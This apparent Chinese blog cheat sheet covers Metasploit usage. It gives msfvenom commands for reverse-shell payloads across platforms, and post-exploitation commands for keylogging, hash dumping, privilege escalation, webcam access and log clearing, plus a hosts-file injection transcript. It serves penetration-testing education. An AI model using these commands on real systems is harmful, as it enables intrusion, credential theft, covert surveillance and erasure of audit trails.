• 网络安全:MSF常用命令总结


    [⊙成功在于你坚持了别人坚持不了的东西⊙]

    前言

    Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

    Metasploit常用模块

    • exploit(漏洞利用程序模板):包含各种 PoC 验证程序,用于验证利用特定漏洞(exploit)的可行性。
    • payload(有效载荷模板):包含各种恶意程序,用于在目标系统上运行任意命令。它可能是 exploit
      的一部分,也可能是独立编译的应用程序。
    • Auxiliaries(辅助工具模板):包含一系列扫描、嗅探、拨号测试、指纹识别和其他类型的安全评估程序。
    • Encoders(编码工具模板):在渗透测试中,这个模板用来加密有效载荷,以避免被杀毒软件、防火墙、IDS/IPS
      以其他类似的反恶意软件检测出来。
    • NOP(空操作模板):这个模板用于在 shellcode 中插入 NOP(汇编指令)。虽然 NOP 不会进行实际的操作,但是在构造
      shellcode 时可以用来暂时替代 playload,形成完整的 shellcode 程序。

    开启msf命令

    msfconsole
    
    • 1

    查看数据库连接状态(一般会自动连接)

    db_status
    
    • 1

    MSF基础指令

    help 或者 ? //帮助菜单
    exit //退出MSF控制台
    back //返回上一级
    info //显示一个或者多个模块的信息
    show //显示所给类型的模块
    background //将当前操作在后台运行
    use //使用所选择的模块
    set //设置漏洞参数(rhost、rport等)
    unset //取消设置漏洞参数
    search 漏洞name //查询漏洞工具
    use 漏洞ID //使用漏洞工具
    show options //查看漏洞工具配置
    sessions -i //查看攻击状态

    MSF中的Payload生成

    1、Windows/Linux

    Windows:
    msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名
    Linux:
    msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名
    
    • 1
    • 2
    • 3
    • 4

    2、WEB

    PHP:
    msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口] -f raw > 保存路径/文件名.php
    ASP:
    msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.asp JSP: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jsp WAR: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f war > 保存路径/文件名.war
    
    • 1
    • 2
    • 3
    • 4

    3、Android

    Android:
    msfvenom -p android/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -o 保存路径/文件名.apk
    
    • 1
    • 2

    MSF命令参数

     1 Options:
     2     -p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-'或者stdin指定
     3     -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
     4     -n, --nopsled    <length>        为payload预先指定一个NOP滑动长度
     5     -f, --format     <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
     6     -e, --encoder    [encoder]       指定需要使用的encoder(编码器)
     7     -a, --arch       <architecture>  指定payload的目标架构
     8         --platform   <platform>      指定payload的目标平台
     9     -s, --space      <length>        设定有效攻击荷载的最大长度
    10     -b, --bad-chars  <list>          设定规避字符集,比如: &#039;\x00\xff'
    11     -i, --iterations <count>         指定payload的编码次数
    12     -c, --add-code   <path>          指定一个附加的win32 shellcode文件
    13     -x, --template   <path>          指定一个自定义的可执行文件作为模板
    14     -k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行
    15         --payload-options            列举payload的标准选项
    16     -o, --out   <path>               保存payload
    17     -v, --var-name <name>            指定一个自定义的变量,以确定输出格式
    18         --shellest                   最小化生成payload
    19     -h, --help                       查看帮助选项
    20         --help-formats               查看msf支持的输出格式列表
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20

    MSF常用系统命令

    check:检查指定特定目标是否存在安全漏洞,并且能被exploit(攻击模块)利用
    sessions    #sessions –h 查看帮助
    sessions -i <ID值>  #进入会话   -k  杀死会话
    background  #将当前会话放置后台
    run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
    info #查看已有模块信息
    getuid # 查看权限 
    getpid # 获取当前进程的pid
    sysinfo # 查看目标机系统信息
    ps # 查看当前活跃进程    kill  杀死进程
    idletime #查看目标机闲置时间
    reboot / shutdown   #重启/关机
    shell #进入目标机cmd shell
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13

    MSF网络命令

    ipconfig/ifconfig  #查看IP地址
    netstat –ano  #查看端口情况
    getproxy   #查看代理信息
    route   #查看路由
    
    • 1
    • 2
    • 3
    • 4

    渗透目标主机后使用的命令

    inconfig:列举被渗透主机的网络接口信息
    arp    #列举被渗透主机的ARP缓存
    shell:获取被渗透主机的cmd shell
    getuid:获取当前用户信息
    getsystem:提权
    getpid:查看Meterepreter会话在被渗透主机内的进程号
    ps:列举被渗透主机的所有进程号
    sysinfo:列举被渗透主机的信息系统
    upload /initrd.img C:\\    :将文件上传到目标系统
    rmdir  **.txt    :删除文件
    enumdesktops     :桌面命令
    screenshot   :截图
    webcam_list  :摄像头
    获取键盘记录:
     1. keyscan_start
     2. keyscan_dump
    
    run hashdump   :获取密码哈希值
    clearev   :清除系统日志
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19

    对host文件进行注入:

    msf6 exploit(windows/local/ms10_015_kitrap0d) > use post/windows/manage/inject_host
    msf6 post(windows/manage/inject_host) > options
    
    Module options (post/windows/manage/inject_host):
    
       Name     Current Setting  Required  Description
    
       DOMAIN                    yes       Domain name for host file manipulation.
       IP                        yes       IP address to point domain name to.
       SESSION                   yes       The session to run this module on.
    
    msf6 post(windows/manage/inject_host) > set session 1
    session => 1
    msf6 post(windows/manage/inject_host) > set ip 192.168.1.113
    ip => 192.168.1.113d
    msf6 post(windows/manage/inject_host) > set domain www.tianxiu.com
    domain => www.tianxiu.com
    msf6 post(windows/manage/inject_host) > exploit
    
    [*] Inserting hosts file entry pointing www.tianxiu.com to 192.168.1.113..
    [+] Done!
    [*] Post module execution completed
    msf6 post(windows/manage/inject_host) > 
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23

    实践案例:
    网络安全:kali之MSF工具基本使用方法

    如有侵权,请联系删除!

  • 相关阅读:
    详解CAN总线:CAN总线报文格式—错误帧
    Python学习笔记(2)
    ZMQ之脱机可靠性--巨人模式
    <顺序表及模拟实现>——《Data Structure in C Train》
    计算机网络复习——数据链路层
    HCIP--路由策略实验
    理解JS函数之call,apply,bind
    16 Linux 内核定时器
    Vue3+TS+ElementPlus 001 环境配置
    oracle存储过程记录
  • 原文地址:https://blog.csdn.net/weixin_44202489/article/details/127663534